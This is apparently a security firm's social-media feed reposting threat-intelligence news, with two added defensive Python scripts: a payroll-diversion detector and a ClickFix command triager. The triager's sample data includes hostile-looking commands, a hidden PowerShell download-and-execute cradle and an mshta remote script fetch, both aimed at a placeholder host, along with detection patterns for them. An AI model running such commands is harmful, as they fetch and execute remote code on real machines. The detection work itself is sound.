Helping businesses stay ahead with modern, secure, and scalable information technology solutions. #MSP #MSSP #Cybersecurity #Compliance

Oklahoma City, OK
Joined October 2022
Buonasera Group retweeted
Token theft is the cybersecurity version of valet fraud.🔑 You hand over the keys. The valet makes a copy. Later, they take your car for a joyride. SOC Analyst Faith Stratton breaks down how it works and why it’s so effective.👇
The Microsoft Digital Defense Report 2025 shows how threats are evolving faster than ever, fueled by AI. msft.it/6017sf36v

Key insights from the report include:
- More than 50% of cyberattacks with known motives had financial objectives such as extortion or ransom, while only 4% were motivated solely by espionage.
- For initial access, attacks targeted the well-known exposure footprint, including web-facing assets (18%), external remote services (12%), and supply chains (3%).
- Meanwhile, identity-based attacks rose by 32%. More than 97% of identity attacks are password spray or brute force attacks.
- There has been an 87% increase in campaigns aimed at disrupting customer cloud environments through ransomware, mass deletion, or other destructive actions.
- Threat actors have begun using AI in malicious activities, including automated vulnerability discovery, phishing, malware or deepfake generation, data analysis, and crafting highly convincing fraudulent messages.

The report is rich with findings and observations like these on a wide range of topics, including cybercrime, identity attacks, ransomware, fraud, social engineering, cloud threats, and nation-state threat actors. At @Microsoft, we’re taking action against these threats by disrupting cybercriminal ecosystems, sharing threat intelligence, and investing in proactive defenses to protect people, data, and critical systems. AI is reshaping both threats and defenses. With responsible AI and cross-sector collaboration, organizations can reduce risk, safeguard identities, and build resilient systems. Read the Microsoft Digital Defense Report 2025 for more insights and defense guidance.
The October 2025 security updates are available:
Security updates for October 2025 are now available! Details are here: msft.it/6018SZEg0 #PatchTuesday #SecurityUpdateGuide
Microsoft Threat Intelligence has observed a financially motivated threat actor, Storm-2657, compromising employee accounts to gain unauthorized access to profiles and divert salary payments to attacker-controlled accounts. msft.it/6016s0hvp Storm-2657 is actively targeting a range of US-based organizations, particularly employees in sectors like higher education, with such "payroll pirate" attacks to gain access to third-party human resources (HR) software as a service (SaaS) platforms like Workday. These attacks leverage sophisticated social engineering tactics and take advantage of the complete lack of multifactor authentication (MFA) or lack of phishing-resistant MFA to compromise accounts. While the observed campaign specifically targeted Workday profiles, any SaaS systems storing HR or payment and bank account information could be easily targeted with the same technique. Learn more about Storm-2657’s campaign and the TTPs employed, and get comprehensive detection, hunting queries, and guidance for investigation and remediation to defend against this threat in this Microsoft Threat Intelligence blog.
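The Storm-2657 post above describes the pattern: an employee account protected by no MFA, or by MFA that is not phishing-resistant, is taken over and its payment destination in the HR platform is changed. The following is an added example, not Microsoft's hunting queries and not Workday's (or any vendor's) audit schema: it correlates each constructed "payment_account_changed" audit event with the login that preceded it and raises a finding when that login used no MFA, used MFA that is not phishing-resistant, or came from an IP address the account had never used. The event and field names, the MFA labels, the 12-hour session window and the sample log lines are all assumptions.

```python
"""Flag payroll-destination changes made from weakly authenticated sessions.

Added example; the audit-log format below is constructed and is NOT Workday's
(or any vendor's) real schema. Event names, MFA labels and the window are
assumptions chosen to illustrate the correlation.
"""
import json
from datetime import datetime, timedelta

PHISHING_RESISTANT = {"fido2", "certificate"}  # assumption: labels our constructed log uses
SESSION_WINDOW = timedelta(hours=12)           # assumption: max gap between login and change

# Constructed JSON-lines audit log (not real data). Each user has an older
# login, a recent login, then a payment-account change. Only bob's recent
# login comes from an IP the account has never used before.
SAMPLE_LOG = """\
{"ts": "2025-09-01T08:00:00", "user": "alice", "event": "login", "mfa": "fido2", "ip": "203.0.113.10"}
{"ts": "2025-09-20T09:00:00", "user": "alice", "event": "login", "mfa": "fido2", "ip": "203.0.113.10"}
{"ts": "2025-09-20T09:05:00", "user": "alice", "event": "payment_account_changed", "ip": "203.0.113.10"}
{"ts": "2025-09-02T08:00:00", "user": "bob", "event": "login", "mfa": "otp", "ip": "198.51.100.5"}
{"ts": "2025-09-21T14:00:00", "user": "bob", "event": "login", "mfa": "otp", "ip": "192.0.2.77"}
{"ts": "2025-09-21T14:11:00", "user": "bob", "event": "payment_account_changed", "ip": "192.0.2.77"}
{"ts": "2025-09-03T08:00:00", "user": "carol", "event": "login", "mfa": "none", "ip": "198.51.100.9"}
{"ts": "2025-09-22T10:00:00", "user": "carol", "event": "login", "mfa": "none", "ip": "198.51.100.9"}
{"ts": "2025-09-22T10:02:00", "user": "carol", "event": "payment_account_changed", "ip": "198.51.100.9"}
{"ts": "2025-09-04T08:00:00", "user": "dave", "event": "login", "mfa": "otp", "ip": "198.51.100.20"}
{"ts": "2025-09-23T11:00:00", "user": "dave", "event": "login", "mfa": "otp", "ip": "198.51.100.20"}
{"ts": "2025-09-23T11:30:00", "user": "dave", "event": "payment_account_changed", "ip": "198.51.100.20"}
"""


def parse_log(text):
    """Parse JSON lines into event dicts sorted by timestamp."""
    events = []
    for line in text.strip().splitlines():
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"])
        events.append(event)
    events.sort(key=lambda e: e["ts"])
    return events


def find_payroll_diversions(events):
    """Return one finding per payment_account_changed event that looks risky.

    A change is risky when the login that preceded it (within SESSION_WINDOW)
    used no MFA, used MFA that is not phishing-resistant, or came from an IP
    the account had never logged in from, or when no such login exists.
    """
    seen_ips = {}    # user -> IPs seen on earlier logins
    last_login = {}  # user -> most recent login event
    findings = []
    for event in events:
        user = event["user"]
        if event["event"] == "login":
            # Judge novelty against IPs seen before this login, then record it.
            event["new_ip"] = event["ip"] not in seen_ips.setdefault(user, set())
            seen_ips[user].add(event["ip"])
            last_login[user] = event
            continue
        if event["event"] != "payment_account_changed":
            continue
        login = last_login.get(user)
        reasons = []
        if login is None or event["ts"] - login["ts"] > SESSION_WINDOW:
            reasons.append("no_recent_login")
        else:
            if login["mfa"] == "none":
                reasons.append("no_mfa")
            elif login["mfa"] not in PHISHING_RESISTANT:
                reasons.append("weak_mfa:" + login["mfa"])
            if login["new_ip"]:
                reasons.append("new_ip:" + login["ip"])
        if not reasons:
            continue  # phishing-resistant MFA from a known IP: nothing to raise
        weak = any(r.startswith("weak_mfa") for r in reasons)
        new_ip = any(r.startswith("new_ip") for r in reasons)
        high = "no_mfa" in reasons or "no_recent_login" in reasons or (weak and new_ip)
        findings.append({
            "user": user,
            "ts": event["ts"].isoformat(),
            "severity": "high" if high else "medium",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in find_payroll_diversions(parse_log(SAMPLE_LOG)):
        print(finding)
```

On the sample data alice (FIDO2, known IP) produces nothing, bob (OTP from a new IP) and carol (no MFA at all) are high, and dave (OTP from a known IP) is medium. In a real deployment the MFA method usually comes from the identity provider's sign-in log rather than the HR application, so the join is across two sources; the correlation itself is the same.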
Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices daily. msft.it/6010snbHo This technique exploits users’ tendency to resolve technical issues by tricking them into running malicious commands. These commands, in turn, deliver payloads that ultimately lead to information theft and exfiltration. Our latest blog discusses the elements that make up a ClickFix campaign, from different arrival vectors and lure implementations, to various defense evasion methods. Because ClickFix requires human action to execute the malicious commands, it could circumvent conventional and automated security defenses. Organizations can therefore mitigate its impact by educating users to recognize its lures and implementing device-hardening policies. Read more of our analysis and detection and mitigation recommendations.
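The ClickFix post above notes that the technique depends on the user typing or pasting the command themselves, which is also what makes it detectable: the interpreter is started by the user's shell rather than by a document or installer, and the pasted command line carries the download cradle. The following is an added example, not Microsoft's detection logic: it triages constructed process-creation events with Sysmon-style parent, image and command-line fields, and flags interpreters whose command line shows cradle or obfuscation markers, scoring them higher when the parent is explorer.exe (the Win+R Run dialog). It goes slightly beyond the post by also scoring encoded commands that were not user-launched, so the role of the parent-process criterion is visible. The indicator names, the regexes, the parent-process list and the sample events are assumptions.

```python
"""Triage process-creation events for ClickFix-style user-pasted commands.

Added example with constructed events; indicator names and patterns are our
own assumptions, not a vendor rule set.
"""
import re

# Interpreters/LOLBins a ClickFix lure typically tells the victim to run (assumption).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}
# The Win+R Run dialog is hosted by explorer.exe, so a pasted command appears
# as its child. Treated as "user-launched" here (assumption).
USER_LAUNCHERS = {"explorer.exe"}

# Command-line indicators, weakest to strongest. Labels are ours.
INDICATORS = [
    ("lure_comment", re.compile(r"#\s*.*\b(robot|captcha|verif)", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("inline_execution", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("download_cradle", re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("mshta_remote", re.compile(r"\bmshta(\.exe)?\s+[\"']?https?://", re.I)),
    ("base64_decode", re.compile(r"frombase64string", re.I)),
]
STRONG = {"download_cradle", "encoded_command", "mshta_remote", "base64_decode"}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": 'powershell -w hidden -c "iex (irm https://verify.example.invalid/check)"'
            ' # I am not a robot - reCAPTCHA Verification ID: 8731'},
    {"id": 2, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c dir C:\Users"},
    {"id": 3, "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmd": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"id": 4, "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmd": "powershell -NoP -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 5, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": 'mshta "https://verify.example.invalid/step2.hta"'},
]


def basename(path):
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return findings for interpreter launches whose command line matches indicators.

    Severity is "high" when a user-launched interpreter (parent in
    USER_LAUNCHERS) carries at least one strong indicator, else "medium".
    """
    findings = []
    for ev in events:
        if basename(ev["image"]) not in INTERPRETERS:
            continue
        hits = [name for name, rx in INDICATORS if rx.search(ev["cmd"])]
        if not hits:
            continue  # benign-looking interpreter use, e.g. a plain "dir"
        user_launched = basename(ev["parent"]) in USER_LAUNCHERS
        severity = "high" if user_launched and STRONG & set(hits) else "medium"
        findings.append({"id": ev["id"], "severity": severity,
                         "user_launched": user_launched, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Event 1 (hidden-window cradle pasted into Run with a fake CAPTCHA comment) and event 5 (mshta fetching a remote HTA from explorer.exe) come out high; event 4 (an encoded command under svchost.exe) is medium because nothing ties it to a user action; events 2 and 3 produce nothing. The same logic maps onto the device-hardening side the post mentions: blocking these interpreters from being spawned by explorer.exe for ordinary users removes the execution path the lure depends on.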
The August 2025 security updates are available:
Security updates for August 2025 are now available! Details are here: msft.it/6018SZEg0 #PatchTuesday #SecurityUpdateGuide
Update: Microsoft has released security updates that fully protect customers using all supported versions of SharePoint affected by CVE-2025-53770 and CVE-2025-53771.
Microsoft has released security updates that fully protect customers using all supported versions of SharePoint affected by CVE-2025-53770 and CVE-2025-53771. These vulnerabilities apply to on-premises SharePoint Servers only. Customers should apply these updates immediately to ensure they’re protected. Full guidance and detection details are available in our blog: msft.it/6010sDzSE
The June 2025 security updates are available:
Security updates for June 2025 are now available! Details are here: msft.it/6018SZEg0 #PatchTuesday #SecurityUpdateGuide
Buonasera Group retweeted
KeeperPAM is now on CISA’s CDM Approved Products List. Trusted to protect federal agencies with zero-trust privileged access management. Secure passwords, accounts and remote access with Keeper Federal 👉 bit.ly/4j7z10Z. #KeeperSecurity #Cybersecurity
🚨 Mandiant Threat Defense is investigating an UNC6032 campaign that utilizes fake “AI video generator” websites to distribute infostealer and other malware. Get the details, and learn how to stay ahead of this threat: bit.ly/3H7AWFJ
The May 2025 security updates are available:
Security updates for May 2025 are now available! Details are here: msft.it/6018SZEg0 #PatchTuesday #SecurityUpdateGuide
The notable developments in the ransomware ecosystem in the first quarter of 2025 range from a nation-state ransomware threat actor acting as a ransomware-as-a-service (RaaS) affiliate to deploy commodity ransomware for the first time to another threat actor expanding their hybrid cloud environment compromise techniques. These shifts are combined with tried-and-tested techniques like exploitation of newly disclosed vulnerabilities and social engineering.

Microsoft Threat Intelligence observed the North Korean state actor Moonstone Sleet deploying Qilin ransomware in limited attacks. This is the first time that the actor, who previously exclusively used custom ransomware, deployed ransomware from a RaaS operator.

Storm-0501 resumed campaigns where they were observed moving laterally from on-premises environments to the cloud. In recent attacks, Storm-0501 targeted unmanaged devices and used an insecure hybrid account to move laterally, gain access to resources, and delete backups before sending an extortion message. Microsoft previously reported on Storm-0501: msft.it/6011S6VuW

The leak of Black Basta ransomware group chat messages in February revealed their key techniques, like use of Citrix, Jenkins, and virtual private network (VPN) exploits, weak ESXi authentication, and compromised SSH for lateral movement. Black Basta is a closed ransomware offering that first appeared in April 2022 and has been used by multiple threat actors. The leaked chat indicated an overlap in activity between Storm-1674, Storm-1811, and Sangria Tempest. There was little change in activity from Storm-1674, one of the most active ransomware threat actors this quarter, but activity from Storm-1811 seemed to stop shortly after the leak. In addition to Storm-1674, the most active threat actors were Lace Tempest, Storm-0249, and Storm-1175.

Storm-1175 was observed exploiting critical vulnerabilities CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728 in remote monitoring and management (RMM) tool SimpleHelp shortly after these were disclosed and patched in January to deploy Medusa ransomware.

Fake IT scams continued to be the initial access technique used by many ransomware actors. Storm-2410 initiated contact with targets through fake IT calls, followed by the use of client management tool Quick Assist or the QEMU emulation software to remotely gain a foothold in the environment. Similarly, Storm-1674 was observed using fake IT calls through Microsoft Teams, leading to Quick Assist and PowerShell usage. Storm-1674 was observed using PowerShell leading to the Noiserv command-and-control (C2) framework.
The April 2025 security updates are available:
Security updates for April 2025 are now available! Details are here: msft.it/60119yPTS #PatchTuesday #SecurityUpdateGuide
Buonasera Group retweeted
Happy birthday, @gmail! 🥳 We have a surprise: Enterprise users can send end-to-end encrypted (E2EE) messages to any user on any email inbox with just a few clicks (despite the timing, this is not a joke). → goo.gle/3E1eX1T
Buonasera Group retweeted
🚨 Apple just patched a zero-day under active attack! CVE-2025-24201 lets hackers escape the WebKit sandbox—Apple calls the exploit “extremely sophisticated.”
Targeted? Unknown
Duration? Unknown
But if you use an iPhone, Mac, or Vision Pro—update NOW. 📲
Details: thehackernews.com/2025/03/ap…
The March 2025 security updates are available:
Security updates for March 2025 are now available. Details are available here: msft.it/60119yPTS #PatchTuesday #SecurityUpdateGuide
Buonasera Group retweeted
No shock: Infostealers stay stealing.
In fact, we saw them more than ANY other threat in 2024.
Credentials, passwords, network names—hackers are after it all.
@Laughing_Mantis stopped by #TradecraftTuesday to share some expert insights.
Buonasera Group retweeted
🚨 Mandiant has detected threat actors leveraging x86-64 compiled macOS malware, likely due to broader compatibility and relaxed execution policies. Understand how to investigate these intrusions → bit.ly/4haFZ4j
Buonasera Group retweeted
North Korea has long been involved in cyber operations. Recent tactics involve the use of fake identities to get hired as IT workers at major companies. These operations are now moving beyond the U.S., with a notable focus on Europe. Learn more: bit.ly/41y3O08